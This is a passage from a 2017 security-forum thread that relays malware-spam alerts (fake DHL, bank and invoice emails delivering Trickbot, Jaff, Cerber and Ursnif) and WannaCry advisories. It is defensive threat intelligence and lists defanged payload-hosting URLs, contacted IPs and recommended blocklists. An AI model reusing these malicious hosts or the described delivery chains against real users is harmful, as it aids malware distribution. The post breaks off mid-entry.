Edited by AplusWebMaster, 28 April 2017 - 01:10 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1921 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 01 May 2017 - 05:52 AM

FYI...

Fake 'MoneyGram' SPAM - delivers new java Adwind
- https://myonlinesecu...adwind-version/
1 May 2017 - "... -fake- financial themed emails containing java adwind or Java Jacksbot attachments... previously mentioned many of these HERE[1]... Today’s has a  slightly different subject and email content to previous ones...
1] https://myonlinesecu.../?s=java adwind

Screenshot: https://myonlinesecu...m-MoneyGram.png

Updated Guidelines from MG.jar (480 kb) -  Current Virus total detections 2/58*. MALWR **... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1493604843/

** https://malwr.com/an...TA1NTM5MWZjMjE/
 

:ninja: :ninja:   :grrr:


.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1922 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 02 May 2017 - 05:26 AM

FYI...

Fake 'DHL' SPAM - js script
- http://blog.dynamoo....8878382814.html
2 May 2017 - "... another -fake- DHL message leading to an evil .js script.
    From: DHL Parcel UK [redacted]
    Sent: 02 May 2017 09:30
    To: [redacted]
    Subject: DHL Shipment 458878382814 Delivered
    You can track this order by clicking on the following link:
    https ://www .dhl .com/apps/dhltrack/?action=track&tracknumbers=458878382814&language=en&opco=FDEG&clientype=ivother
    Please do not respond to this message. This email was sent from an unattended mailbox. This report was generated at approximately 08:15 am CDT on 02/05/2017.
    All weights are estimated.
    The shipment is scheduled for delivery on or before the scheduled delivery displayed above. DHL does not determine money-back guarantee or delay claim requests based on the scheduled delivery. Please see the DHL Service Guide for terms and conditions of service, including the DHL Money-Back Guarantee, or contact your DHL customer support representative.
    This tracking update has been sent to you by DHL on behalf of the Requestor [redacted]. DHL does not validate the authenticity of the requestor and does not validate, guarantee or warrant the authenticity of the request, the requestor's message, or the accuracy of this tracking update.
    Standard transit is the date the package should be delivered by, based on the selected service, destination, and ship date. Limitations and exceptions may apply. Please see the DHL Service Guide for terms and conditions of service, including the DHL Money-Back Guarantee, or contact your DHL Customer Support representative.


In this case the link goes to parkpaladium .com/DHL24/18218056431/ and downloads a file
 DHL-134843-May-02-2017-55038-8327373-1339347112.js . According to Malwr* and Hybrid Analysis** the script downloads a binary from
 micromatrices .com/qwh7zxijifxsnxg20mlwa/ (77.92.78.38 - UK2, UK) and then subsequently attempts communication with
75.25.153.57 (AT&T, US)
79.170.95.202 (XL Internet Services, Netherlands)
87.106.148.126 (1&1, Germany)
78.47.56.162 (Mediaforge, Germany)
81.88.24.211 (dogado GmbH, Germany)
92.51.129.235 (Host Europe, Germany)
74.50.57.220 (RimuHosting, US)
The dropped binary has a VirusTotal detection rate of 10/60***.
Recommended blocklist:
77.92.78.38
75.25.153.57
79.170.95.202
87.106.148.126
78.47.56.162
81.88.24.211
92.51.129.235
74.50.57.220
"
* https://malwr.com/an...jQyOTA1ZjM3MjM/
Hosts
77.92.78.38
79.170.95.202


** https://www.hybrid-a...vironmentId=100
Contacted Hosts
77.92.78.38
75.25.153.57
79.170.95.202
87.106.148.126
78.47.56.162
81.88.24.211
92.51.129.235
74.50.57.220


*** https://virustotal.c...sis/1493719562/
mlgih3wgw.exe
___

Fake 'Secure email' SPAM - delivers Trickbot
- https://myonlinesecu...banking-trojan/
2 May 2017 - "An email with the subject of 'Secure email message' pretending to come from Companies House  but actually coming from a look alike domain <noreply@ cp-secure-message .co.uk> with a malicious word doc attachment is today’s latest spoof of a well known company, bank or public authority delivering Trickbot banking Trojan...

Screenshot: https://myonlinesecu...ure-message.png

SecureMessage.doc - Current Virus total detections 5/55*. Payload Security** shows a download from
 http ://gestionbd .com/fr/QMjJrcCrHGW9sb6uF.png which of course is -not- an image file but a renamed .exe file that gets renamed to Epvuyf.exe and autorun (VirusTotal 8/61***)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1493724795/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
216.138.226.110
50.19.97.123
186.208.111.188
82.146.94.86


*** https://www.virustot...sis/1493725297/
Epvuyf.exe

gestionbd .com: 216.138.226.110: https://www.virustot...10/information/
> https://www.virustot...15290/analysis/
___

Cerber Ransomware - evolution
- http://blog.trendmic...ware-evolution/
May 2, 2017 - "... enterprises and individual users alike are taking the brunt, with the U.S. accounting for much of Cerber’s impact. We’ve also observed Cerber’s adverse impact among organizations in education, manufacturing, public sector, technology, healthcare, energy, and transportation industries:
Top countries affected by Cerber:
> https://blog.trendmi...4/cerber6-1.jpg
Infection chain of Cerber Version 6:
> https://blog.trendmi...4/cerber6-2.jpg
Adding a time delay in the attack chain enables Cerber to elude traditional sandboxes, particularly those with time-out mechanisms or that wait for the final execution of the malware. Other JS files we saw ran powershell.exe (called by wscript.exe) whose parameter is a PowerShell script — the one responsible for downloading the ransomware and executing it in the system:
Sample Cerber 6-carrying spam email posing as a public postal service agency:
> https://blog.trendmi...4/cerber6-4.jpg
... Cerber was updated with the capability to integrate the infected system into botnets, which were employed to conduct distributed denial of service (DDoS) attacks. By July, a spam campaign was seen abusing cloud-based productivity platform Office 365 through Office documents embedded with a malicious macro that downloads and helps execute the ransomware. Exploit kits are also a key element in Cerber’s distribution. Cerber-related malvertising campaigns were observed in 2016 diverting users to Magnitude, Rig, and Neutrino — which has since gone private — exploit kits that target system or software vulnerabilities. This year, we’re seeing relatively new player Sundown exploit kit joining the fray... Cerber’s distribution methods remain consistent, we’ve seen newer variants delivered as self-extracting archives (SFX package) containing malicious Visual Basic Script (.VBS) and Dynamic-link library (.DLL) files that execute a rather intricate attack chain compared to other versions... it’s one of the signs of things to come for Cerber. It is not far-fetched for Cerber to emulate how Locky constantly changed email file attachments in its spam campaigns by expanding arrival vectors beyond JS files and PowerShell scripts — from JScript to HTML Application (.HTA) and compressed binary files (.BIN) — and exploiting file types that aren’t usually used to deliver malware... we’re currently seeing .HTA files being leveraged by a campaign that uses Cerber as payload. Our initial analysis indicates that the campaign, which we began monitoring by the third week of April, appears to be targeting Europe. We also found the same campaign attacking two Latin American countries. This campaign is notable for displaying Cerber’s ransom note in the local language of the infected system. It uses an .HTA file to show the online message/ransom note as well as detect the local language to be displayed...
Cerber’s evolution reflects the need for organizations and end users to be aware of today’s constantly evolving threats. End users risk losing money and their important personal files to ransomware; it also threatens organizations’ business operations, reputation, and bottom line. While there is no silver bullet against ransomware, keeping systems up-to-date, taking caution against unsolicited and suspicious emails, regularly backing up important files, and cultivating a culture of cybersecurity in the workplace are just some of the best practices for defending against ransomware. IT/system administrators and information security professionals can further defend their organization’s perimeter by incorporating additional layers of security against suspicious files, processes, applications, and network activity that can be exploited and leveraged by ransomware. Users and businesses can also benefit from a multilayered approach to security that covers the gateway, endpoints, networks, and servers..."
(More detail at the trendmicro URL above.)
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 02 May 2017 - 02:57 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1923 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 04 May 2017 - 05:49 AM

FYI...

Fake 'PAYMENT' SPAM - delivers malware
- https://myonlinesecu...e-link-exploit/
4 May 2017 - "An email with the subject of 'PAYMENT FOR YAREED' (I am assuming random names) coming from random names and email addresses with a malicious word doc attachment delivers some sort of malware via the CVE-2017-0199 word/rtf embedded ole -link- exploit ...

Screenshot: https://myonlinesecu...-for-yareed.png

PO NO- YAREED-2017.doc (30kb) - Current Virus total detections 16/56*. Payload Security** shows a download of an hta file from
 http ://alguemacultural .com/enessss.hta (VirusTotal 0/52***) (Payload Security[4])
The smaller second word doc also contacts the -same- location & downloads the -same- file
 PO NO- YAREED-2017.doc (7kb) - Current Virus total detections 16/55[5] | Payload Security[6]
... The hta file is an executable html file that internet explorer -will- run... which is an encoded powershell script... which when decoded looks like this which downloads the genuine putty.exe from
 https ://the.earth .li/~sgtatham/putty/0.68/w32/putty.exe which is -renamed- to nextobad.exe and autorun...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1493869646/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
174.136.152.24

*** https://www.virustot...sis/1493870176/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
46.43.34.31

5] https://www.virustot...sis/1493869660/

6] https://www.hybrid-a...vironmentId=100
Contacted Hosts
174.136.152.24

alguemacultural .com: 174.136.152.24: https://www.virustot...24/information/
> https://www.virustot...8dfbf/analysis/

the.earth .li: 46.43.34.31: https://www.virustot...31/information/
> https://www.virustot...ffaa1/analysis/
___

Fake 'document' SPAM - delivers malware
- https://myonlinesecu...ude-of-malware/
4 May 2017 - "... An email with the subject using -random- characters pretending to come from somebody that the recipient knows with a-link-to -download- a malicious word doc that delivers some sort of multi-stage malware...

Screenshot: https://myonlinesecu...RQ-03681348.png

ZPDML-36-45320-document-May-04-2017.doc - Current Virus total detections 7/56*. Payload Security** shows a download  from -numerous- different locations via powershell which gives 23905.exe (VirusTotal ***) (Payload Security[4])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1493873579/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
188.65.115.184
75.25.153.57
79.170.95.202
87.106.148.126
78.47.56.162
81.88.24.211
92.51.129.235


*** https://www.virustot...sis/1493852073/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
75.25.153.57
79.170.95.202
87.106.148.126
78.47.56.162
81.88.24.211
92.51.129.235
74.50.57.220
139.59.33.202

___

Fake 'BACs Documents' SPAM - delivers Trickbot
- https://myonlinesecu...banking-trojan/
4 May 2017 - "An email with the subject of 'Important BACs Documents' pretending to come from Lloyds Bank but actually coming from a look-a-like domain <secure@ lloydsbankdocuments .com> with a malicious word doc attachment... delivering Trickbot banking Trojan...

Screenshot: https://myonlinesecu...S-documents.png

BACs.doc - Current Virus total detections 6/56*. Payload Security** shows a download from
 http ://www .247despatch .co.uk/grabondanods.png which of course is -not- an image file but a renamed .exe file that gets renamed to Gehsp.exe and autorun (VirusTotal 12/61***)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1493896398/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
91.102.64.132
50.19.97.123
200.116.206.58
91.247.36.80
91.219.28.71
91.247.36.79


*** https://www.virustot...sis/1493896665/

247despatch .co.uk: 91.102.64.132: https://www.virustot...32/information/
> https://www.virustot...96ed9/analysis/
___

Fake multiple subjects/attachments SPAM - delivers Trojan via js files
- https://myonlinesecu...n-via-js-files/
4 May 2017 - "... There have been numerous -different- subjects and campaign themes... some of them here:
    'Our reference: 733092244' pretending to come from Eli Murchison <Hughchaplin@ yahoo .de>
    'Hotel booking confirmation (Id:022528)' pretending to come from Booking <noreply@ sgs.bookings .com>
    'DHL Shipment Notification : 0581957002' pretending to come from DHL Customer Support <support@ dhl .com>
    'Re: img' pretending to come from seisei-1@ yahoo .de
    'scan' pretending to come from stephen@ arrakis .es
Some of the file attachment names, -all- extracting to .js files, include:
    reservation details 9I2XIIWTM.zip (VirusTotal [1]| Payload Security[2])
    info-DOMESTIC_EXPRESS Pickup Date2017-05-04.zip (VirusTotal [3]| Payload Security[4])
    img-A34401586965107279 jpeg.zip (VirusTotal [5]| Payload Security[6])
    CCPAY9196902168.zip (VirusTotal [7]| Payload Security[8])
    Scan P.1 0967945763.zip which is slightly different because it extracts -2- different .js files
      (VirusTotal[9]| Payload Security[10]) (VirusTotal[11]| Payload Security[12])

Screenshots[1]: https://myonlinesecu...n-Id-022528.png

2] https://myonlinesecu...e-733092244.png

3] https://myonlinesecu...-0581957002.png

4] https://myonlinesecu...7/05/re_img.png

5] https://myonlinesecu.../birch_scan.png

-All- of these download the -same- malware from
 http ://horcor .com/ese.tf -or-
 http ://www .nemcicenadhanou .cz/nvdtime.prs which are -renamed- .exe files that are -renamed- to an .exe file and autorun (VirusTotal[13]| Payload Security[14])... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://www.virustot...sis/1493904287/

2] https://www.hybrid-a...vironmentId=100

13] https://www.virustot...sis/1493900783/

14] https://www.hybrid-a...vironmentId=100

horcor .com: 47.91.92.64: https://www.virustot...64/information/
> https://www.virustot...9d426/analysis/
Malicious site

nemcicenadhanou .cz: Could not find an IP address for this domain name. [May have been taken down...]
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 04 May 2017 - 11:27 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1924 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 08 May 2017 - 07:04 AM

FYI...

Fake 'Payment Advice' SPAM - delivers malware
- https://myonlinesecu...livers-malware/
8 May 2017 - "... an email with the subject of 'FW: Payment Advice – Advice Ref:[G32887529930] / Priority payment / Customer Ref:[03132394]' pretending to come from HSBC Advising Service <050717.advisingservice@ mail .com>....

Screenshot: https://myonlinesecu...dvice-email.png

Payment_Advice.zip: Extracts to: Payment_Advice.scr - Current Virus total detections 32/62*. MALWR**...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1494218279/

** https://malwr.com/an...zQwYTlmZGRkMzQ/
___

Fake 'update your mailbox' - phish
- https://myonlinesecu...-phishing-scam/
8 May 2017 - "... pretends to be a message from 'Email Support' to 'Update Your Mailbox'. Of course these do -not- come from Microsoft or Live .com but are -spoofed- to appear to come from them...

Screenshot: https://myonlinesecu...shing-email.png

If you follow the link inside the email you see a webpage looking like this:
 http ://www.mir-holoda .by/pic/fanc/en-gb/?email=jeremiah@ thespykiller .co.uk (where the email address the email was sent to is automatically inserted):
> https://myonlinesecu...05/mailbox1.png

After you input your password, you first get get told “checking details” then “incorrect details” and forwarded to an almost identical looking page where you can put it in again:
> https://myonlinesecu...05/mailbox2.png

> https://myonlinesecu...05/mailbox3.png

> https://myonlinesecu...05/mailbox4.png

... Don’t assume that all attempts are obvious. Watch for any site that invites you to enter ANY personal or financial information..."

mir-holoda .by: 91.149.189.125: https://www.virustot...25/information/
> https://www.virustot...48c26/analysis/
 

:ninja: :ninja:    :grrr:


.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1925 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 11 May 2017 - 04:58 AM

FYI...

Fake 'pdf attachment' SPAM - delivers Locky/Dridex
- https://myonlinesecu...df-attachments/
11 May 2017 - "... well used email template with subjects varying from with literally hundreds if not thousands of subjects. These generally deliver either Locky ransomware or Dridex banking Trojan.
    File_69348406
    PDF_9859
    Scan_2441975
    Document_11048
    Copy_9762
They -all- have a pdf attachment that drops a word doc with macros... all downloads from these locations which delivers an encrypted txt file that should be converted by the macro to a working.exe file but Payload security.... doesn’t seem able to convert it...
wipersdirect .com/f87346b
tending .info/f87346b
julian-g .ro/f87346b

I am being told this is a -new- ransomware called jaff ransomware*...
* https://twitter.com/...586080507424769
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."

wipersdirect .com: 108.165.22.125: https://www.virustot...25/information/
> https://www.virustot...49ec3/analysis/

tending .info: 80.75.98.151: https://www.virustot...51/information/
> https://www.virustot...35742/analysis/

julian-g .ro: 86.35.15.215: https://www.virustot...15/information/
> https://www.virustot...82654/analysis/
___

Fake 'DHL Statements' SPAM - delivers js malware
- https://myonlinesecu...livers-malware/
11 May 2017 - "... an email with the subject of '6109175302 Statements x Requests Required' (random numbers)  pretending to come frombgyhub@ dhl .com with a zip attachment containing -2- differently named .js files which delivers some sort of malware...

Screenshot: https://myonlinesecu...ts-Required.png

TYPE OF GOODS_DECLARATION.zip: Extracts to: DECLARATION (FORM).PDF.js -and- TYPE OF GOODS DOC.pdf.js
 Current Virus total detections [1] [2]:  Payload Security [3] [4] shows a download from one or both of these locations:
  http ://schuetzen-neusalz .de/images/banners/gbfont.se -or- http ://wersy .net/cuts.vs which is renamed and autorun by the script (VirusTotal [5]) (Payload Security[6])... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://www.virustot...sis/1494487534/

2] https://www.virustot...sis/1494487531/

3] https://www.hybrid-a...vironmentId=100

4] https://www.hybrid-a...vironmentId=100

5] https://www.virustot...sis/1494488118/

6] https://www.hybrid-a...vironmentId=100

schuetzen-neusalz .de: 85.13.146.159: https://www.virustot...59/information/
> https://www.virustot...cc5ce/analysis/

wersy .net: 217.29.53.99: https://www.virustot...99/information/
> https://www.virustot...0680e/analysis/
___

Malware spam with 'nm.pdf' attachment
- http://blog.dynamoo....attachment.html
11 May 2017 - "Currently underway is a malicious spam run with various subjects, for example:
Scan_5902
Document_10354
File_43359
Senders are random, and there is -no- body text. In -all- cases there is a PDF attached named nm.pdf with an MD5 of D4690177C76B5E86FBD9D6B8E8EE23ED -or- 6B305C5B59C235122FD8049B1C4C794D (and possibly more). Detection rates at VirusTotal are moderate [1] [2].
The PDF file contains an embedded Word .docm macro document. Hybrid Analysis [3] [4] is partly successful, but it shows a run-time error for the malicious code, but it does demonstrate that malicious .docm file is dropped with a detection rate of 15/58[5].
Putting the .docm file back into Hybrid Analysis and Malwr [6] [7] shows the same sort of results, namely a download from:
easysupport .us/f87346b ...
UPDATE: A contact pointed out this Hybrid Analysis[X] which looks like basically the same thing, only in this sample the download seems to work. Note the references to "jaff" in the report, which -matches- this Tweet[8] about something called "Jaff ransomware".
That report also gives two other locations to look out for:
trialinsider .com/f87346b
fkksjobnn43 .org/a5/

This currently gives a recommended blocklist of:
47.91.107.213
trialinsider .com
easysupport .us
"
1] https://virustotal.c...sis/1494492097/

2] https://virustotal.c...sis/1494492251/

3] https://www.hybrid-a...vironmentId=100
Contacted Hosts
198.58.93.28 - easysupport .us
- https://www.virustot...28/information/
> https://www.virustot...de188/analysis/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
198.58.93.28 - easysupport .us

5] https://virustotal.c...sis/1494492613/

6] https://www.hybrid-a...vironmentId=100
198.58.93.28 - easysupport .us

> https://www.virustot...de188/analysis/

7] https://malwr.com/an...WY1NjU5ZDViNzk/

8] https://twitter.com/...597006363152385

X] https://www.hybrid-a...vironmentId=100
Contacted Hosts
107.154.168.227 - trialinsider .com
47.91.107.213 - fkksjobnn43 .org

trialinsider .com: 107.154.161.227: https://www.virustot...27/information/
> https://www.virustot...4291a/analysis/
107.154.168.227: https://www.virustot...27/information/
> https://www.virustot...4291a/analysis/

 

fkksjobnn43 .org: 47.91.107.213: https://www.virustot...13/information/
> https://www.virustot...4e012/analysis/
___

Fake 'DHL' SPAM - delivers Trojan
- https://myonlinesecu...banking-trojan/
11 May 2017 - "... an email with the subject of 'Fwd: DHL Redelivery Confirmation #574068024996' (random numbers) pretending to come from random companies, names and email addresses with a semi-random named zip attachment which delivers Ursnif banking Trojan...

Screenshot: https://myonlinesecu...-redelivery.png

request-redelivery-2017053299810.pdf.js - Current Virus total detections 1/57*. Payload Security** shows a download from one or both of these locations
  http ://schuetzen-neusalz .de/images/banners/gbfont.se -or- http ://wersy .net/cuts.vs
 which is -renamed- and autorun by the script (VirusTotal 9/62***) (Payload Security[4])... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1494500118/

** https://www.hybrid-a...vironmentId=100

*** https://www.virustot...sis/1494488118/

4] https://www.hybrid-a...vironmentId=100

schuetzen-neusalz .de: 85.13.146.159: https://www.virustot...59/information/
> https://www.virustot...cc5ce/analysis/

wersy .net: 217.29.53.99: https://www.virustot...99/information/
> https://www.virustot...0680e/analysis/
___

Fake 'invoice' SPAM - using docs with embedded ole objects
- https://myonlinesecu...ed-ole-objects/
11 May 2017 - "... banking Trojans. This one is using a different delivery method to try to throw us off track... this has a word docx attachment that contains an embedded ole object that when you click on the blurry image in the word doc, thinking you are opening an invoice you actually open & run the embedded hidden .js file. This pretends to be an invoice coming from random senders:
> https://myonlinesecu...-ole-object.png

Screenshot: https://myonlinesecu...ozi-invoice.png

7398219046.docx - Current Virus total detections 2/58*. Payload Security** shows the dropped .js file but doesn’t make it available for download. I had to get that manually (VirusTotal 1/55***) (Payload Security[4]) which shows
 the same connections and download from one or both of these locations
  http ://schuetzen-neusalz .de/images/banners/gbfont.se -or- http ://wersy .net/cuts.vs
which is renamed and autorun by the script (VirusTotal 9/62[5]) (Payload Security[6])... This email attachment contains what appears to be a genuine word doc or Excel XLS spreadsheet with either a macro script or an embedded OLE object that when run will infect you... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1494509580/

** https://www.hybrid-a...vironmentId=100

** https://www.virustot...sis/1494508789/

4] https://www.hybrid-a...vironmentId=100

5] https://www.virustot...sis/1494488118/

6] https://www.hybrid-a...vironmentId=100

schuetzen-neusalz .de: 85.13.146.159: https://www.virustot...59/information/
> https://www.virustot...cc5ce/analysis/

wersy .net: 217.29.53.99: https://www.virustot...99/information/
> https://www.virustot...0680e/analysis/
___

New ‘Jaff’ ransomware via Necurs ...
- https://blog.malware...asks-for-2-btc/
May 11, 2017 - "... yet another ransomware on the block, but contrary to the many copycats out there this one appears to be more serious and widespread since it is part of the Necurs spam campaigns... Jaff ransomware looks very identical to Locky in many ways: same distribution via the Necurs botnet, same PDF that opens up a Word document with a macro, and also similar payment page:
> https://blog.malware...17/05/email.png
...
> https://blog.malware.../Jaff_decoy.png
... this is where the comparison ends, since the code base is different as well as the ransom itself. Jaff asks for an astounding 2 BTC, which is about $3,700 at the time of writing:
> https://blog.malware...5/encrypted.png
...  the return of Locky after a short hiatus has not been as big as anticipated. The appearance of the Jaff ransomware may also take away some market shares from it."
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 11 May 2017 - 02:26 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1926 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 12 May 2017 - 06:23 AM

FYI...

Fake 'Scanned image' SPAM - delivers jaff ransomware
- https://myonlinesecu...aff-ransomware/
12 May 2017 - "An email with the subject of 'Scanned image' coming or pretending to come from random email addresses with a pdf attachment that contains an embedded malicious word doc delivers jaff ransomware...

Screenshot: https://myonlinesecu...d-image_pdf.png

20170512605164.pdf - which drops N5OSUHX.docm - Current Virus total detections [pdf*] [docm**]:
Payload Security [pdf...] [docm(4)] shows a download of an encrypted txt file from
 http ://trebleimp .com/77g643 which is converted to by the macro to ratchet20.exe ... It also shows a connection to
 http ://h552terriddows .com/a5/ which gives a created message...
>> Update: managed to get the ratchet20.exe file via:
> https://jbxcloud.joe...s/268338/1/html - (VirusTotal [5]) (Payload Security[6])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1494559929/

** https://www.virustot...sis/1494562144/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
27.254.44.204
47.91.107.213


5] https://www.virustot...sis/1494559081/

6] https://www.hybrid-a...vironmentId=100

trebleimp .com: 27.254.44.204: https://www.virustot...04/information/
> https://www.virustot...4c8ba/analysis/

h552terriddows .com: 47.91.107.213: https://www.virustot...13/information/
> https://www.virustot...fcafd/analysis/
___

New ‘Jaff’ ransomware via Necurs ...
- https://blog.malware...asks-for-2-btc/
May 11, 2017 - "... yet another ransomware on the block, but contrary to the many copycats out there this one appears to be more serious and widespread since it is part of the Necurs spam campaigns... Jaff ransomware looks very identical to Locky in many ways: same distribution via the Necurs botnet, same PDF that opens up a Word document with a macro, and also similar payment page:
> https://blog.malware...17/05/email.png
...
> https://blog.malware.../Jaff_decoy.png
... this is where the comparison ends, since the code base is different as well as the ransom itself. Jaff asks for an astounding 2 BTC, which is about $3,700 at the time of writing:
> https://blog.malware...5/encrypted.png
...  the return of Locky after a short hiatus has not been as big as anticipated. The appearance of the Jaff ransomware may also take away some market shares from it."
___

U.K. Hospitals Hit - Widespread Ransomware Attack
- https://krebsonsecur...somware-attack/
May 12, 2017 - "At least 16 hospitals in the United Kingdom are being forced to divert emergency patients today after computer systems there were infected with ransomware... there are indications the malware may be spreading to vulnerable systems through a security hole in Windows that was recently patched by Microsoft:
Ransom note left behind on computers infected with the Wanna Decryptor ransomware strain.
Image: BleepingComputer

> https://krebsonsecur...nna-580x285.png
In a statement*, the U.K.’s National Health Service (NHS) said a number of NHS organizations had suffered ransomware attacks... According to CCN-CERT, that flaw is MS17-010**, a vulnerability in the Windows Server Message Block (SMB) service, which Windows computers rely upon to share files and printers across a local network. Malware that exploits SMB flaws could be extremely dangerous inside of corporate networks because the file-sharing component may help the ransomware spread rapidly from one infected machine to another..."
* https://www.digital....HS-cyber-attack

** https://technet.micr...y/ms17-010.aspx
March 14, 2017

 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 12 May 2017 - 02:01 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1927 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 15 May 2017 - 04:31 AM

FYI...

Indicators Associated With WannaCry Ransomware
- https://www.us-cert....lerts/TA17-132A
Last revised: May 15, 2017 - "... According to numerous open-source reports, a widespread ransomware campaign is affecting various organizations with reports of tens of thousands of infections in as many as 74 countries, including the United States, United Kingdom, Spain, Russia, Taiwan, France, and Japan. The software can run in as many as 27 different languages. The latest version of this ransomware variant, known as WannaCry, WCry, or Wanna Decryptor, was discovered the morning of May 12, 2017, by an independent security researcher and has spread rapidly over several hours... Initial reports indicate the hacker or hacking group behind the WannaCry campaign is gaining access to enterprise servers either through Remote Desktop Protocol (RDP) compromise or through the exploitation of a critical Windows SMB vulnerability. Microsoft released a security update for the MS17-010* (link is external) vulnerability on March 14, 2017. Additionally, Microsoft released patches for Windows XP, Windows 8, and Windows Server 2003 (link is external) operating systems on May 13, 2017. According to open sources, one possible infection vector is via phishing emails...
* https://technet.micr...y/ms17-010.aspx
March 14, 2017
The WannaCry ransomware received and analyzed by US-CERT is a loader that contains an AES-encrypted DLL. During runtime, the loader writes a file to disk named “t.wry”. The malware then uses an embedded 128-bit key to decrypt this file. This DLL, which is then loaded into the parent process, is the actual Wanna Cry Ransomware responsible for encrypting the user’s files. Using this cryptographic loading method, the WannaCry DLL is never directly exposed on disk and not vulnerable to antivirus software scans...
Precautionary measures to mitigate ransomware threats include:
- Ensure anti-virus software is up-to-date.
- Implement a data back-up and recovery plan to maintain copies of sensitive or proprietary data in a separate and secure location. Backup copies of sensitive data should not be readily accessible from local networks.
- Scrutinize -links- contained in -e-mails- and do -not- open -attachments- included in unsolicited e-mails.
- Only download software – especially free software – from sites you know and trust.
- Enable automated patches for your operating system and Web browser..."
(More detail at the us-cert URL at the top of this post).

WannaCry/WannaCrypt Ransomware Summary
- https://isc.sans.edu...l?storyid=22420
2017-05-15
___

> http://blog.talosint...nacry.html#more
May 12, 2017 - "... Umbrella* prevents DNS resolution of the domains associated with malicious activity..."
* https://umbrella.cisco.com/
... aka 'OpenDNS' - FREE:
>> https://www.opendns..../?new=home-free

Test -after- setups: https://welcome.opendns.com/
___

Fake 'invoice' SPAM - delivers pdf attachment jaff ransomware
- https://myonlinesecu...eliver-malware/
15 May 2017 - "An email pretending to be an invoice coming from random senders with a PDF attachment that drops a malicious macro enabled word doc...
Update: confirmed as Jaff ransomware (VirusTotal 5/61*) (Payload Security**)...

Screenshot: https://myonlinesecu...ent-malspam.png

... An alternative docm file that was extracted confirms it to be jaff ransomware downloads
 ecuamiaflowers .com/hHGFjd encrypted txt (Payload Security[3]) (VirusTotal 13/56[4]) JoeSandbox[/5]... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1494846406/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
47.91.107.213

3] https://www.hybrid-a...vironmentId=100
Contacted Hosts
107.180.14.32
47.91.107.213


4] https://www.virustot...sis/1494844454/

5] https://jbxcloud.joe...s/271421/1/html

ecuamiaflowers .com: 107.180.14.32: https://www.virustot...32/information/
> https://www.virustot...85814/analysis/

h552terriddows .com: 47.91.107.213: https://www.virustot...13/information/
> https://www.virustot...42c85/analysis/
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 15 May 2017 - 07:31 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1928 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 16 May 2017 - 05:25 AM

FYI...

Fake 'invoice' SPAM - downloads Cerber ransomware
